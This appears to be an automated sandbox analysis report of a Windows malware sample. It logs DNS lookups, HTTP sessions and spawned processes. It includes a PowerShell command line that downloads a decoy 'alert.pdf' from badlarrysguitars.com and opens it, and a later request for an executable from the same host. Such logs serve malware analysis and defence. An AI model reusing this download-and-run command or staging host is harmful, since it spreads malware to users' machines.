                                                            Dec 6, 2024 15:53:39.398739100 CET49806443192.168.2.10101.99.75.174
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 6, 2024 15:53:00.482866049 CET5073953192.168.2.101.1.1.1
                                                            Dec 6, 2024 15:53:00.620666027 CET53507391.1.1.1192.168.2.10
                                                            Dec 6, 2024 15:53:14.295722961 CET4998953192.168.2.101.1.1.1
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 6, 2024 15:53:00.482866049 CET192.168.2.101.1.1.10x54eaStandard query (0)badlarrysguitars.comA (IP address)IN (0x0001)false
                                                            Dec 6, 2024 15:53:14.295722961 CET192.168.2.101.1.1.10xfafaStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 6, 2024 15:53:00.620666027 CET1.1.1.1192.168.2.100x54eaNo error (0)badlarrysguitars.com101.99.75.174A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 15:53:14.437144041 CET1.1.1.1192.168.2.100xfafaNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                            Dec 6, 2024 15:53:14.979360104 CET1.1.1.1192.168.2.100x68d3No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 15:53:14.979360104 CET1.1.1.1192.168.2.100x68d3No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 15:53:28.426223993 CET1.1.1.1192.168.2.100x544aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 15:53:28.426223993 CET1.1.1.1192.168.2.100x544aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 15:54:16.680840015 CET1.1.1.1192.168.2.100x2a6bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 15:54:16.680840015 CET1.1.1.1192.168.2.100x2a6bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 15:54:17.952187061 CET1.1.1.1192.168.2.100xb258No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 15:54:17.952187061 CET1.1.1.1192.168.2.100xb258No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 15:54:40.737366915 CET1.1.1.1192.168.2.100x80fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 15:54:40.737366915 CET1.1.1.1192.168.2.100x80fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 15:55:04.917664051 CET1.1.1.1192.168.2.100x3a8aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                            Dec 6, 2024 15:55:04.917664051 CET1.1.1.1192.168.2.100x3a8aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                            • badlarrysguitars.com
                                                            • https:
                                                              • p13n.adobe.io
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.1049709101.99.75.1744437740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-06 14:53:02 UTC180OUTGET /share/alert.pdf HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: badlarrysguitars.com
                                                            Connection: Keep-Alive
                                                            2024-12-06 14:53:02 UTC322INHTTP/1.1 200 OK
                                                            Date: Fri, 06 Dec 2024 14:53:02 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 126079
                                                            Last-Modified: Fri, 15 Nov 2024 19:44:32 GMT
                                                            Content-Disposition: inline; filename=alert.pdf
                                                            Cache-Control: no-cache
                                                            ETag: "1731699872.0-126079-2713651938"
                                                            Connection: close
                                                            Content-Type: application/pdf
                                                            2024-12-06 14:53:02 UTC7870INData Raw: 25 50 44 46 2d 31 2e 37 0a 25 e2 e3 cf d3 0a 31 20 30 20 6f 62 6a 20 0a 3c 3c 0a 2f 43 6f 6c 6f 72 53 70 61 63 65 20 2f 44 65 76 69 63 65 52 47 42 0a 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0a 2f 48 65 69 67 68 74 20 31 30 38 33 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 0a 2f 57 69 64 74 68 20 38 35 31 0a 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 0a 2f 4c 65 6e 67 74 68 20 31 32 35 32 32 31 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c ec dd 65 d4 24 d5 d5 b7 71 5c 83 7b 08 04 09 ee 16 dc dd 09 ee 0e 83 c3 e0 ce e0 1a dc dd 5d 07 77 d7 e0 6e 01 82 43 70 12 20 79 12 fa fd ad de 2f 67 55 da ee 1e 63 48 66 5f 1f 66 f5 dd 5d 75 64 9f 2d ff 53 55 dd 53 ab 25 49 92 24 49 92 24 49 92
                                                            Data Ascii: %PDF-1.7%1 0 obj <</ColorSpace /DeviceRGB/Subtype /Image/Height 1083/Filter /FlateDecode/Type /XObject/Width 851/BitsPerComponent 8/Length 125221>>streamxe$q\{]wnCp y/gUcHf_f]ud-SUS%I$I$I
                                                            2024-12-06 14:53:02 UTC7860INData Raw: b9 34 cd 26 e2 8a ee 15 26 3a 32 ce 96 d7 c7 c4 38 75 6a 3c 06 69 16 4a 00 d3 99 8b 5c c1 a3 bc 2e cf 32 c9 c3 0c c2 aa 5c 7a cd 35 d7 94 d5 4d c7 29 1a 57 a4 c2 da 2f be f8 a2 04 c2 0e 4a 8f 14 a4 dc c8 a8 5c da 31 8e a4 eb d8 47 c0 b2 6d ad 2e fc 8c 79 81 05 16 50 b3 1e 7e f8 61 f9 4a 1a 51 86 2e bb ec 32 66 d9 63 8f 3d 34 5b b4 5c 03 2c 20 84 e5 1c 21 e0 b5 da 21 e2 24 9f 98 f2 b1 c7 1e cb a4 d2 8b 4e 7d 6a 6c c2 f6 92 4b 2e 61 0a 8d 33 c5 31 c7 1c a3 0b 06 51 35 74 5a b4 68 15 07 6b 96 05 14 94 07 ea 48 a7 d2 57 08 3f b1 7f ca 29 a7 18 80 c4 cb 74 3c 44 da 94 1f 4c 84 7d 0c 5b a4 4b d4 5e 18 12 e7 91 d8 29 c3 7b ef bd 57 bf 54 19 67 88 30 e7 45 b6 00 96 f5 e0 83 0f f6 11 53 58 8e 59 66 99 45 bd 90 a8 69 57 f9 e1 b9 e7 9e 23 0e d9 9f 7c 22 84 0c db 91
                                                            Data Ascii: 4&&:28uj<iJ\.2\z5M)W/J\1Gm.yP~aJQ.2fc=4[\, !!$N}jlK.a31Q5tZhkHW?)t<DL}[K^){WTg0ESXYfEiW#|"
                                                            2024-12-06 14:53:02 UTC8192INData Raw: 15 c5 3e 31 da f9 e7 9f 7f bf fd f6 8b 7e 63 3a 31 80 ce 63 a8 9a ae c1 3e 65 99 1c a0 86 76 2f fc 62 a5 8a ab c7 60 ca 8e 23 ac 87 10 7e c7 1f 7f 7c 58 2c 8c d9 60 8a 6a 74 34 4f a1 08 bf b2 ca 9d 2d 1c 23 d1 5d d8 30 0c 58 6d b9 c1 eb bc 6f ee 65 d1 cb 61 4e 2f b6 0d ca 00 1c df f0 51 35 70 08 86 1e 85 5f 4b 3f 2f c9 ad 61 2e 55 23 b7 5c 47 9d 3a 2b 0e 6e 99 30 ab 07 97 ae ab 99 ea fb 3a e5 ac 76 0e 13 03 f0 29 2b 45 23 0d f1 1b 0b da d0 78 3b aa 7e 5e 35 69 d4 88 7f d6 69 e9 cf c5 69 1d f6 f9 e7 9f f7 93 f0 eb 1c aa d5 b2 d2 59 f8 19 f9 6e bb ed 36 fb ec b3 7f fa e9 a7 c5 44 ed 16 a8 1d ba 8b e3 7b f4 6a 9f 6e bc f1 c6 8a e6 3b ef bc d3 b2 bb aa 43 1a 7c d8 bf 5a 13 cb c4 ab 09 27 4c ed dc f2 51 73 7e a8 46 44 d5 43 ba 89 b2 6a 2e 0d 2f 8d 76 50 0d fc
                                                            Data Ascii: >1~c:1c>ev/b`#~|X,`jt4O-#]0XmoeaN/Q5p_K?/a.U#\G:+n0:v)+E#x;~^5iiiYn6D{jn;C|Z'LQs~FDCj./vP
                                                            2024-12-06 14:53:02 UTC7808INData Raw: e6 29 44 c8 37 b7 d0 ee 4b a3 cd 3d d6 2a 7e 15 ab 53 cd 12 d5 04 52 1d 40 73 17 d5 d8 69 68 bf 21 70 7a 8c cd 0e 7e 1e ee 11 16 68 58 e2 b2 fa 0d 4b 4c f5 6d b0 c1 06 65 78 d5 8f c2 7a d5 89 94 ae ab 5e 1d eb 5e b5 61 4b 0f 6c 76 b9 86 15 ac 5a af 73 14 54 f3 43 0c b8 8c a1 a5 cf 7c f7 9f ff 91 4a e9 c8 61 cd c9 bc d9 9e d5 ff 4d a9 43 a8 16 0b c7 47 1d dc ac 56 59 f4 ea 7f a5 51 cd ae 1d a6 5f ed 2b 26 db 5c da ba ef ae 61 99 5a d6 c4 6a b5 2a 1d 11 7e 34 61 ec b0 5a 0e bb a1 2c 56 73 54 8f 51 56 bc 25 d6 ba 79 8d 7c b4 ed b6 db da 39 96 9b b3 ed d0 4e 29 3a 0d 1e ee cd aa 6f 74 ae c5 c5 b1 9b 0d d2 f0 5f 9f f4 f8 df 03 b5 5c e8 86 4c 1e ef fc 37 fe 4f 88 49 92 0c 99 3c f3 cc 33 2b ad b4 d2 3b ef bc 33 b8 07 92 f4 40 08 bf c1 3d 8a e4 bf 8f 22 fc 7e e6
                                                            Data Ascii: )D7K=*~SR@sih!pz~hXKLmexz^^aKlvZsTC|JaMCGVYQ_+&\aZj*~4aZ,VsTQV%y|9N):ot_\L7OI<3+;3@="~
                                                            2024-12-06 14:53:02 UTC4544INData Raw: 27 63 b4 6c 56 51 10 4a e5 da d4 b9 e7 9e 2b ab c7 f7 58 09 4b 8d c4 77 2a 75 c1 ab 0d 20 84 9f 7c c5 af 4c 33 4a 06 ad 12 5f fd 16 6e dd 0b 3f 0e 63 fa f1 9d c1 5a 3d 70 b6 de 7a 6b 89 68 c0 85 1f 4f 58 74 d1 45 e3 8a 7d 3c fe 4a 15 6b 59 6e 91 54 2d b1 f4 1b 21 23 a0 ec b9 e4 ba c8 c6 16 57 9e 91 6d 22 7d b1 27 07 5e 71 c5 15 b5 29 57 08 f3 b8 59 cc 02 f1 14 74 3b e1 67 8d bc 13 09 24 be 06 ab 38 8e 34 d2 48 c7 1c 73 4c cb cd 1d 07 30 72 d3 89 2f 32 c8 c3 52 77 fc 54 54 14 17 06 97 3a 96 5c 72 c9 a8 ec ec ac 74 3a 20 ae f8 49 e0 86 cd ce 61 37 ab a9 a9 f2 13 31 55 42 f8 31 63 0c 5b d6 62 a5 d8 00 1a e7 25 97 5c c2 a9 aa b7 7a cb cf b9 48 59 ba 58 63 8d 35 e2 46 43 7c 17 fe 8a 2b ae 70 96 d1 da 29 08 8d fd f7 df 3f be dc d1 af c2 2f 9e 4b 67 55 d9 43 ef
                                                            Data Ascii: 'clVQJ+XKw*u |L3J_n?cZ=pzkhOXtE}<JkYnT-!#Wm"}'^q)WYt;g$84HsL0r/2RwTT:\rt: Ia71UB1c[b%\zHYXc5FC|+p)?/KgUC
                                                            2024-12-06 14:53:02 UTC8192INData Raw: 49 8b c2 b1 46 e6 35 ff fc f3 6b 84 c5 f4 7e e0 81 07 46 ef 4e 24 db 7c 44 35 75 16 7e 1a 27 e7 8a dd 8a f0 ab fd e7 ad 5e 4a 86 dc d2 ce 2b af bc 12 b3 33 98 99 66 9a c9 fa 36 98 45 64 19 09 a5 14 06 0c 29 cb 4f 08 a7 5a fd 56 2f 65 c5 21 6b 4d d8 91 89 62 aa 3e a2 cf 16 c0 72 73 63 63 e3 93 c6 79 cf 3d f7 c4 91 1c 89 3b 51 74 26 d5 8d f0 5b 79 e5 95 63 53 d6 40 08 3f ae 78 ed b5 d7 c6 68 2d 96 39 ae ba ea aa fc 21 84 1f 83 47 56 d1 1a 4b 3a 58 0a 2a a9 c3 f0 f8 cf 7d f7 dd 17 b7 7a 2d b7 de 7d d4 4e f8 59 14 49 8c 03 47 0b 66 ba c7 1e 7b d8 2f d8 c7 35 0f 2f 49 92 64 88 42 75 96 81 65 ef f2 8e cd f2 dc 73 cf bd c6 1a 6b c8 b7 e4 87 42 10 97 7a 6a f5 ef 1e 4a 9e d4 54 91 3a 51 40 e5 7f e5 a3 2a fc e4 f3 3f fc e1 0f 72 af 7a 7a c3 4f fc f1 8f 7f 8c 62 44
                                                            Data Ascii: IF5k~FN$|D5u~'^J+3f6Ed)OZV/e!kMb>rsccy=;Qt&[ycS@?xh-9!GVK:X*}z-}NYIGf{/5/IdBueskBzjJT:Q@*?rzzObD
                                                            2024-12-06 14:53:02 UTC7808INData Raw: 28 04 92 5b 7c 61 50 1e d6 7b 44 4a 15 e9 91 1b cb 18 cd 0f 22 2a 13 c2 56 a6 aa ce 9a a6 b2 a1 33 2a 31 a5 41 8a 85 85 c5 4e a9 86 46 6e 33 68 15 6c 90 1d 66 18 3d de 40 a9 0a 3f d5 9c cc d3 69 f5 80 a8 2c ed 84 ba ae 15 44 33 8d 84 a3 1d ad 29 4c 46 a5 fa 93 76 55 7f 90 e8 54 d2 4b 2e b9 a4 1b e1 17 0f c6 74 43 c4 ac 11 9a 8b c0 bf fe fa eb bd b6 67 57 71 9a 15 af 40 96 55 9a 9f 63 31 60 71 6d 6b 19 75 3f e0 84 0e b6 af ec 46 f8 95 5b b1 38 ef bc f3 38 79 dc fe e8 8f 67 fc 64 57 3e 1f 55 52 47 ca 84 de 8d e1 a1 87 1e 62 99 72 57 a5 56 4f a7 bc 62 b6 d9 66 63 e7 fe 13 7e c6 19 17 3d 82 5e bd 7a 29 85 b2 9c b9 0b 5e 41 54 3c d0 14 66 9e 79 66 89 5d a7 db 6e bb 2d 0b f3 d2 f2 e9 55 57 5d 25 40 34 25 60 39 e7 ce 3b ef 5c 6e 42 59 1d 6d 76 2f fc a8 59 41 ad
                                                            Data Ascii: ([|aP{DJ"*V3*1ANFn3hlf=@?i,D3)LFvUTK.tCgWq@Uc1`qmku?F[88ygdW>URGbrWVObfc~=^z)^AT<fyf]n-UW]%@4%`9;\nBYmv/YA
                                                            2024-12-06 14:53:03 UTC8192INData Raw: 6a 3f 55 69 5b b9 ee 85 9d ef f1 2b 02 fc f3 9f ff ac 79 69 55 51 bd 13 bf 4e d9 69 48 e5 1e bf 91 48 fc 6a da e8 2f f1 1b 5c b9 87 b6 66 ca ea e9 9d 88 5f ab 54 83 db dd a5 d6 49 c9 35 c1 3a 71 c2 6a 27 dd 57 2b 43 86 f7 1e bf fe 46 c7 90 8f df 1b d9 2a 61 2f 35 a8 47 ed b5 3a 46 ab 9c d5 54 5f bb 79 6c e2 26 3a a5 eb de 4b 5b a3 6b b0 d7 ba 1d 3e e2 57 3d d4 5f e2 57 b5 57 6b 59 e9 74 e1 ac c6 b2 3a d9 b1 5f f1 d8 9d 76 b2 45 3c f7 5d e6 38 c3 0c 33 54 c7 fd 8c 13 bf b6 57 67 8a 30 6d c3 ad 13 75 e9 e4 cc 25 b1 b7 46 c7 f0 11 bf ee 81 36 20 c4 af ad 00 9d 44 6a eb 4e b5 e9 74 59 74 14 81 bb 57 c6 32 d0 2e bb ec 52 dd 8b eb 5e d1 da d6 ac 68 50 bd 67 b8 15 6d 85 e9 dd 27 ab a7 77 89 df de 95 dc 25 cf 74 e1 d2 9f 59 54 f3 5b f9 5a 9d 45 a7 1a fd c6 c7 1f
                                                            Data Ascii: j?Ui[+yiUQNiHHj/\f_TI5:qj'W+CF*a/5G:FT_yl&:K[k>W=_WWkYt:_vE<]83TWg0mu%F6 DjNtYtW2.R^hPgm'w%tYT[ZE
                                                            2024-12-06 14:53:03 UTC7808INData Raw: c4 c2 40 aa b0 18 31 71 4b d4 a2 40 26 66 1a a9 43 34 21 72 58 10 3d 58 5f 73 4e d1 84 86 45 3f 08 b3 2c 5a fa b1 f6 14 08 7e 6c 2b 2d 3e 13 e5 8f 6f f3 4c 0a 19 67 9c 71 76 da 69 a7 88 be db 6e bb 8d 12 d8 c8 21 9c 87 73 72 78 f5 c2 40 32 8c 3a f5 c2 0b 2f 44 3f 34 43 ab 7e 74 28 fc 2d 42 23 ea 02 9f c1 e4 fb 54 5d c0 9a 48 0c aa 5f a5 67 a3 0b 49 c1 c5 49 ba 13 3f 7a a0 52 9e 43 b7 92 b0 52 b5 c9 26 9b 84 9f 4b 65 e4 a7 40 0a a7 1f 64 4c 18 c6 06 0b 3f 11 56 d6 4a a5 2b 65 9d 5a 62 23 54 88 f1 2b 7a 88 ca 65 7d 27 cf 3b 2a 5e 78 1a d7 e5 69 6d 2f 25 28 22 9c c7 b9 34 80 54 50 26 17 d2 58 00 52 0b 8b b0 23 57 37 59 29 dd 1c 55 76 8d 25 ff 78 48 81 9e 79 9d fe e9 5f 7b 6d 08 c9 db 49 22 fa 84 bf 1c c2 3d 7a d4 ea 17 1e d6 1d fc 3c 96 81 82 9d ce 31 6a 9a
                                                            Data Ascii: @1qK@&fC4!rX=X_sNE?,Z~l+->oLgqvin!srx@2:/D?4C~t(-B#T]H_gII?zRCR&Ke@dL?VJ+eZb#T+ze}';*^xim/%("4TP&XR#W7Y)Uv%xHy_{mI"=z<1j
                                                            2024-12-06 14:53:03 UTC4544INData Raw: 63 8e 39 fa b5 04 56 ac d5 05 a9 0f bf ea ef 70 9f 1c ac 1a 68 e0 e5 97 5f f6 f9 8f 7f fc e3 34 d3 4c 13 cb bd 17 5f 7c f1 c7 3f fe f1 f2 cb 2f df 76 5d ac 46 48 b9 8f 3d f6 d8 a7 2d ee e7 10 eb ae bb ee 80 13 3f 6e cc 81 0b f1 1b b9 90 18 95 e9 3d f6 d8 43 7e 18 d9 b2 7c aa 30 f1 b9 e7 9e bb 47 e2 f7 d9 47 17 e2 67 e1 af 7c 0c 07 f1 93 4c 38 fc ee bb ef 3e e0 49 af 5f c4 ef f9 e7 9f 9f 76 da 69 93 f8 f5 89 1a f1 db 7b ef bd 67 9b 6d 36 b5 60 e4 4a 15 f8 f4 89 df c1 07 1f 3c c9 24 93 7c ae 89 9f 25 9b 29 0c 07 f1 13 f2 df fe f6 b7 3f d7 c4 af 8a 07 1f 7c 70 ac b1 c6 62 d0 11 dc 76 1b 0e e2 f7 c4 13 4f 88 a9 cf 1a f1 ab e2 c8 23 8f ec 91 f8 25 7a c1 7f ff fb 5f f1 a2 98 8e 3b ee b8 53 4e 39 a5 c2 1a c4 ef e2 8b 2f de 6e bb ed 26 9f 7c 72 da 46 b6 df 7d f7
                                                            Data Ascii: c9Vph_4L_|?/v]FH=-?n=C~|0GGg|L8>I_vi{gm6`J<$|%)?|pbvO#%z_;SN9/n&|rF}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.104974854.224.241.1054433472C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-06 14:53:14 UTC1473OUTGET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                            Host: p13n.adobe.io
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Chromium";v="105"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                            Accept: application/json, text/javascript, */*; q=0.01
                                                            x-adobe-uuid: 79164422-1e43-4f8b-9b29-d5ef60e753c7
                                                            x-adobe-uuid-type: visitorId
                                                            x-api-key: AdobeReader9
                                                            sec-ch-ua-platform: "Windows"
                                                            Origin: https://rna-resource.acrobat.com
                                                            Accept-Language: en-US,en;q=0.9
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://rna-resource.acrobat.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            2024-12-06 14:53:15 UTC617INHTTP/1.1 429 Too Many Requests
                                                            Server: openresty
                                                            Date: Fri, 06 Dec 2024 14:53:15 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Methods: GET, OPTIONS
                                                            Access-Control-Allow-Headers: Authorization, Content-Type, X-Api-Key, cache-control, User-Agent, If-None-Match, x-adobe-uuid, x-adobe-uuid-type, X-Request-Id
                                                            Access-Control-Allow-Credentials: true
                                                            Access-Control-Expose-Headers: x-request-id
                                                            Access-Control-Allow-Origin: *
                                                            X-Request-Id: xJ4EoVYEjToyfhZModw0QpeOttQ3UN1h
                                                            Retry-After: 1
                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                            2024-12-06 14:53:15 UTC65INData Raw: 33 36 0d 0a 7b 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 22 34 32 39 30 35 30 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 22 7d 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 36{"error_code":"429050","message":"Too many requests"}0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.1049806101.99.75.1744439188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-06 14:53:38 UTC181OUTGET /private/nois.exe HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: badlarrysguitars.com
                                                            Connection: Keep-Alive
                                                            2024-12-06 14:53:39 UTC187INHTTP/1.1 500 INTERNAL SERVER ERROR
                                                            Date: Fri, 06 Dec 2024 14:53:39 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 265
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            2024-12-06 14:53:39 UTC265INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 20 45 69 74 68 65 72 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 6f 76 65 72 6c 6f 61 64 65 64 20 6f 72 20 74 68 65 72 65 20 69 73 20 61 6e 20 65 72 72 6f 72 20 69 6e 20 74 68 65 20 61 70 70 6c 69 63 61
                                                            Data Ascii: <!doctype html><html lang=en><title>500 Internal Server Error</title><h1>Internal Server Error</h1><p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the applica


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:3
                                                            Start time:09:52:55
                                                            Start date:06/12/2024
                                                            Path:C:\Users\user\Desktop\lg1wwLsmCX.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\lg1wwLsmCX.exe"
                                                            Imagebase:0x400000
                                                            File size:64'456 bytes
                                                            MD5 hash:1CEB5D0CB063290C1F66FCCFED96A220
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:09:52:55
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
                                                            Imagebase:0x7ff7b2bb0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:09:52:55
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff620390000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:09:53:02
                                                            Start date:06/12/2024
                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
                                                            Imagebase:0x7ff64eb90000
                                                            File size:5'641'176 bytes
                                                            MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:8
                                                            Start time:09:53:02
                                                            Start date:06/12/2024
                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                            Imagebase:0x7ff63ec50000
                                                            File size:3'581'912 bytes
                                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:9
                                                            Start time:09:53:02
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                            Imagebase:0x7ff7df220000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:09:53:03
                                                            Start date:06/12/2024
                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1768,i,14827826412355596552,2148674683166230216,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                            Imagebase:0x7ff63ec50000
                                                            File size:3'581'912 bytes
                                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
